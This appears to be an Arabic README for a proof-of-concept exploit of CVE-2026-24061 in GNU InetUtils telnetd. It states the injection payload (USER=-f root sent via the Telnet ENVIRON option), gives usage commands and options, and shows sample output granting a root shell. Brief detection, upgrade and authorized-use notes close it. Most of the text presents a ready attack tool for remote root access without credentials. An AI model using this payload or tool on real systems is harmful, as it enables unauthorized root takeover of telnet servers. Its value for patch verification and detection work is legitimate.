
استغلال إثبات المفهوم (PoC) لثغرة CVE-2026-24061 - تجاوز المصادقة عبر حقن الوسائط في GNU InetUtils telnetd
إصدارات GNU InetUtils من 1.9.3 حتى 2.7 معرضة لثغرة تجاوز المصادقة عن بُعد في خادم telnetd. يفشل برنامج telnetd في تنظيف متغير البيئة USER بشكل صحيح قبل تمريره كوسيط سطر أوامر إلى برنامج login(1). عندما يرسل عميل telnet متغير بيئة USER يحتوي على وسائط سطر أوامر (مثل -f root)، يقوم telnetd بتمرير هذه القيمة غير المنظفة مباشرة إلى برنامج login. يفسر برنامج login الوسيط -f كتعليمات لتجاوز المصادقة، مما يسمح للمهاجم بالحصول على وصول جذر غير مصرح به دون تقديم أي بيانات اعتماد.
تنفيذ كامل لبروتوكول Telnet
DO و DONT و WILL و WONT.حقن تلقائي للحمولة
ENVIRON المعدة مع حقن USER=-f root.قشرة تفاعلية
إدارة الاتصال
تصحيح أخطاء مفصّل
python3 exploit.py <target> -p <port> [options]
| الوسيط | الوصف |
|---|---|
target | عنوان IP أو اسم المضيف الهدف |
| الخيار | الوصف |
|---|---|
-p, --port | المنفذ الهدف (الافتراضي: 23) |
-v, --verbose | تفعيل إخراج التصحيح المفصل |
-t, --timeout | مهلة الاتصال بالثواني (الافتراضي: 5) |
-k, --keepalive | فترة البقاء على الاتصال بالثواني (الافتراضي: 30) |
-h, --help | عرض رسالة المساعدة |
python3 exploit.py 192.168.1.100
python3 exploit.py 192.168.1.100 -p 2323 -v
python3 exploit.py 10.0.0.5 -p 2323 -k 60 -t 10
إنشاء الاتصال
مفاوضة البروتوكول
SGA و ECHO و ENVIRON).تسليم الحمولة
WILL ENVIRON متبوعًا بحمولة التفاوض الفرعي المعدة.تجاوز المصادقة
-f root في login(1) لتجاوز فحوصات بيانات الاعتماد.الجلسة التفاعلية
يستغل هذا الاستغلال خيار Telnet ENVIRON (RFC 1572) لحقن وسائط سطر الأوامر في متغير البيئة USER.
عندما يمرر telnetd هذه القيمة غير المنظفة إلى login -f root، يفسر برنامج login الوسيط -f كعلامة تفرض تجاوز المصادقة، مما يمنح وصول جذر دون التحقق من كلمة المرور.
ينفذ سكربت الاستغلال ما يلي:
WILL, WONT, DO, DONT)NOP للبقاء على الاتصال للحفاظ على استقرار الجلسة$ python3 exploit.py 127.0.0.1 -p 2323
[!] Coded By: K3ysTr0K3R
[*] Telnet Authentication Bypass
[*] Connecting to 127.0.0.1:2323
[+] Connection established
[+] Exploit payload sent (19 bytes)
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#
يمكن لمسؤولي الأنظمة اكتشاف محاولات الاستغلال من خلال مراقبة:
ENVIRON.USER التي تحتوي على -f أو وسائط سطر أوامر أخرى.قم بالترقية إلى إصدار GNU InetUtils 2.8 أو طبق التصحيح الأمني الرسمي الذي ينظف متغيرات البيئة قبل تمريرها إلى login(1).
هذا الإثبات المفاهيمي مخصص لأغراض البحث الأمني، والتحقق من الثغرات، وبيئات الاختبار المصرح بها فقط. استخدمه فقط ضد الأنظمة التي لديك إذن صريح لإجراء تقييمات أمنية عليها.